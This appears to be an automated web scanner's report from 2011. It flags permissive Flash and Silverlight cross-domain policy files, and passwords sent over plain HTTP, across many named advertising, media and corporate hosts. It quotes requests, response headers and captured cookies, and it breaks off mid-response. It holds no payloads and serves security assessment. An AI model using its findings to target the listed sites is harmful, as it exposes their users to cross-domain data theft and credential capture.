HTTP/1.1 200 OK Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g Last-Modified: Sat, 02 Jan 2010 21:22:51 GMT ETag: "220281-8b-47c35173060c0" Content-Type: application/xml Content-Length: 139 Date: Thu, 03 Feb 2011 16:21:59 GMT X-Varnish: 1335021700 Age: 0 Via: 1.1 varnish Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: loga2.doubleverify.com
Response
HTTP/1.1 200 OK Content-Length: 378 Content-Type: text/xml Last-Modified: Sun, 17 Jan 2010 08:19:04 GMT Accept-Ranges: bytes ETag: "0ccdbb4d97ca1:9f7" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:07:01 GMT Connection: close
...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: motifcdn2.doubleclick.net
Response
HTTP/1.0 200 OK Server: Apache ETag: "adb6a2c1ae7705ddf1599956b34e42c2:1222813852" Last-Modified: Tue, 30 Sep 2008 22:30:52 GMT Content-Type: application/xml Date: Thu, 03 Feb 2011 16:07:22 GMT Content-Length: 339 Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://netwx.accuweather.com/netWx-V212.swf?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: news.feedzilla.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Nov 2010 12:12:30 GMT Accept-Ranges: bytes ETag: "54d96c63507bcb1:0" Server: Microsoft-IIS/7.5 Date: Thu, 03 Feb 2011 16:22:30 GMT Connection: close Content-Length: 293
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: omnituretrack.local.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:06 GMT Server: Omniture DC/2.0.0 xserver: www333 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: questionmarket.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: rtsys.reachlocal.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:23:37 GMT Server: Apache Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT ETag: "cc-48103a373c180" Accept-Ranges: bytes Content-Length: 204 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: application/xml Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:52:28 GMT;path=/;httponly
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: rtsys.rtrk.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:23:40 GMT Server: Apache Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT ETag: "cc-48103a373c180" Accept-Ranges: bytes Content-Length: 204 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Connection: close Content-Type: application/xml Set-Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:52:21 GMT;path=/;httponly
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s.ytimg.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT Date: Wed, 02 Feb 2011 19:09:39 GMT Expires: Wed, 09 Feb 2011 19:09:39 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=604800 Age: 76440
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s0.2mdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Wed, 02 Feb 2011 19:09:39 GMT Expires: Thu, 03 Feb 2011 19:09:39 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=86400 Age: 76463
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s1.srtk.net
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:23:39 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 26 Jan 2011 00:57:37 GMT ETag: "1197a8-ff-49ab551aea240" Accept-Ranges: bytes Content-Length: 255 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: tags.crwdcntrl.net
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:23:50 GMT Server: Apache/2.2.8 (CentOS) Last-Modified: Tue, 09 Jun 2009 18:20:38 GMT ETag: "2958196-a5-46bee6a616980" Accept-Ranges: bytes Content-Length: 165 Vary: Accept-Encoding Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: vortex.accuweather.com Proxy-Connection: keep-alive Referer: http://netwx.accuweather.com/netWx-V212.swf?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 09 Feb 2010 20:00:37 GMT Accept-Ranges: bytes ETag: "8020f08bc2a9ca1:2cd" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Host: origin1 Cache-Control: max-age=3600 Date: Thu, 03 Feb 2011 16:23:58 GMT Connection: close Content-Length: 1403
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: weather.weatherbug.com
Response
HTTP/1.0 200 OK Content-Length: 320 Content-Type: text/xml Last-Modified: Thu, 04 Nov 2010 12:35:42 GMT Accept-Ranges: bytes ETag: "df8e9dcb1c7ccb1:dcbe" Server: Microsoft-IIS/6.0 p3p: CP="NON DSP COR NID" X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:34:22 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.accuweather.com
Response
HTTP/1.0 200 OK Content-Length: 1403 Content-Type: text/xml Last-Modified: Tue, 09 Feb 2010 20:00:39 GMT Accept-Ranges: bytes ETag: "c28f298dc2a9ca1:a74" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:34:40 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www1.member-hsbc-group.com
Response
HTTP/1.1 200 OK Content-Length: 82 Content-Type: text/xml Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT Accept-Ranges: bytes ETag: "ef9fe45d4643c81:7da" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:29:52 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: xads.zedo.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:37 GMT Server: ZEDO 3G Last-Modified: Mon, 19 May 2008 09:02:14 GMT ETag: "4557e-f7-44d919ea43180" Accept-Ranges: bytes Content-Length: 247 Edge-Control: dca=esi P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Connection: close Content-Type: application/xml
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ziggymedia.go2cloud.org
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: api.bing.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Content-Length: 634 Content-Type: text/xml Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml" Vary: Accept-Encoding Date: Thu, 03 Feb 2011 13:42:57 GMT Connection: close Set-Cookie: _MD=alg=m2&C=2011-02-03T13%3a42%3a57; expires=Sun, 13-Feb-2011 13:42:57 GMT; domain=.bing.com; path=/ Set-Cookie: _SS=SID=FBE0622867B545E3BC3608E6771E4D62; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/ Set-Cookie: SRCHD=D=1626582&MS=1626582; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/ Set-Cookie: SRCHUID=V=2&GUID=66899BBFDACA49CA8903CE79870122B3; expires=Sat, 02-Feb-2013 13:42:57 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110203; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-http-request-headers-from domain="*.bing.com" he ...[SNIP]... <allow-access-from domain="*.bing.com"/> ...[SNIP]... <allow-access-from domain="blstc.msn.com"/> ...[SNIP]... <allow-access-from domain="stc.sandblu.msn-int.com"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: clicks.superpages.com
Response
HTTP/1.1 200 OK Server: Unspecified ETag: W/"301-1296249771000" Last-Modified: Fri, 28 Jan 2011 21:22:51 GMT Content-Type: application/xml Content-Length: 301 Date: Thu, 03 Feb 2011 16:10:10 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.superpages.com"/><allow-access-from domain="*.bettervideo.com"/><allow-access-from domain="*.biemedia.com"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: imgssl.superpages.com
Response
HTTP/1.0 200 OK Server: Unspecified Last-Modified: Thu, 29 Nov 2007 21:24:19 GMT ETag: "87c-d2-efd546c0" Accept-Ranges: bytes Content-Length: 210 Content-Type: application/xml Date: Thu, 03 Feb 2011 16:21:56 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.superpages.com" /></cross-doma ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: media.superpages.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:22:23 GMT Server: Unspecified Last-Modified: Tue, 04 Dec 2007 18:46:47 GMT ETag: "85d-d2-4755a097" Accept-Ranges: bytes Content-Length: 210 Connection: close Content-Type: application/xml
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.superpages.com" /></cross-doma ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: static.ak.fbcdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-Cnection: close Date: Thu, 03 Feb 2011 16:23:48 GMT Content-Length: 1581 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: us.rd.yahoo.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:34:15 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT Accept-Ranges: bytes Content-Length: 228 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.apple.com
Response
HTTP/1.0 200 OK Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT ETag: "8d-3f8918f48ef00" Server: Apache/2.2.11 (Unix) X-N: S X-Cache-TTL: 600 X-Cached-Time: Wed, 22 Dec 2010 18:51:54 GMT Content-Type: application/xml Content-Length: 141 Cache-Control: max-age=137 Expires: Thu, 03 Feb 2011 16:37:30 GMT Date: Thu, 03 Feb 2011 16:35:13 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: advertising.microsoft.com
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 303 Content-Type: text/html Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 13:43:24 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: citi.bridgetrack.com
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 452 Content-Type: text/html Server: Date: Thu, 03 Feb 2011 13:43:00 GMT Connection: close
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.br.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 19:54:04 GMT
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 18:54:04 GMT Date: Thu, 03 Feb 2011 13:42:58 GMT
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: dev.virtualearth.net
Response
HTTP/1.1 200 OK Cache-Control: max-age=5443200 Content-Type: text/xml Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT Accept-Ranges: bytes ETag: "a92e8be3f49acb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:06:48 GMT Connection: close Content-Length: 374
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: omnituretrack.local.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:06 GMT Server: Omniture DC/2.0.0 xserver: www375 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: s0.2mdn.net
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Wed, 02 Feb 2011 17:43:30 GMT Expires: Wed, 02 Feb 2011 17:43:26 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 81632 Cache-Control: public, max-age=86400
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: api.bing.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Content-Length: 348 Content-Type: text/xml Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml" Vary: Accept-Encoding Date: Thu, 03 Feb 2011 13:42:57 GMT Connection: close Set-Cookie: _MD=alg=m2&C=2011-02-03T13%3a42%3a57; expires=Sun, 13-Feb-2011 13:42:57 GMT; domain=.bing.com; path=/ Set-Cookie: _SS=SID=91EAB46F84594F0BBDFDA6EF008A1930; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/ Set-Cookie: SRCHD=D=1626582&MS=1626582; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/ Set-Cookie: SRCHUID=V=2&GUID=1B1BC0ECE78B4BFB99962A5130D7F53B; expires=Sat, 02-Feb-2013 13:42:57 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110203; expires=Sat, 02-Feb-2013 13:42:57 GMT; domain=.bing.com; path=/
The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.microsoft.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=900 Content-Type: text/xml Last-Modified: Tue, 12 May 2009 23:10:10 GMT Accept-Ranges: bytes ETag: "c4640cc56d3c91:0" Server: Microsoft-IIS/7.5 VTag: 279716841700000000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 17:00:16 GMT Connection: keep-alive Content-Length: 572
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1 Host: daffodil.acsevents.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET / HTTP/1.1 Host: forums.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:05:45 GMT Server: Microsoft-IIS/6.0 Hostname: photo-02 X-Powered-By: PHP/5.2.16 Set-Cookie: session_id=140970ab83b6322d8ecbd3389e56dd24; path=/; httponly Content-type: text/html Content-Length: 140999
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]... <td align="right" valign="middle">
GET /mailman/listinfo/arin-tech-discuss HTTP/1.1 Host: lists.arin.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:10 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=us-ascii Content-Length: 12070
GET /article/SB50001424052970203537304576017783391376872.html HTTP/1.1 Host: online.barrons.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:41 GMT Server: Apache/2.0.58 (Unix) X-DEBUG-BOX-IDENT: sbkj2kapachep04 X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.4a X-DEBUG-REQUEST: /article/SB50001424052970203537304576017783391376872.html X-DEBUG-NAMESPACE: reno-barrons Set-Cookie: djcs_route=3422cf49-4bc5-4845-811c-c9461f1059b1; domain=.barrons.com; path=/; Expires=Sun Jan 31 14:14:41 2021; max-age=315360000 X-DEBUG-BOX-IDENT: sbkj2kapachep04 X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.4a X-DEBUG-REQUEST: /entitlements_handler?mg=reno-barrons&url=http%3A%2F%2Fonline.barrons.com%2Farticle%2FSB50001424052970203537304576017783391376872.html X-DEBUG-NAMESPACE: reno-barrons X-DEBUG-BOX-IDENT: sbkj2kapachep04 X-DEBUG-MODULE-VERSION: DJCS mod_mon 0.7.0.9.4a X-DEBUG-REQUEST: /public/article/SB50001424052970203537304576017783391376872.html X-DEBUG-NAMESPACE: reno-barrons Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 19:14:56 GMT P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=50 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 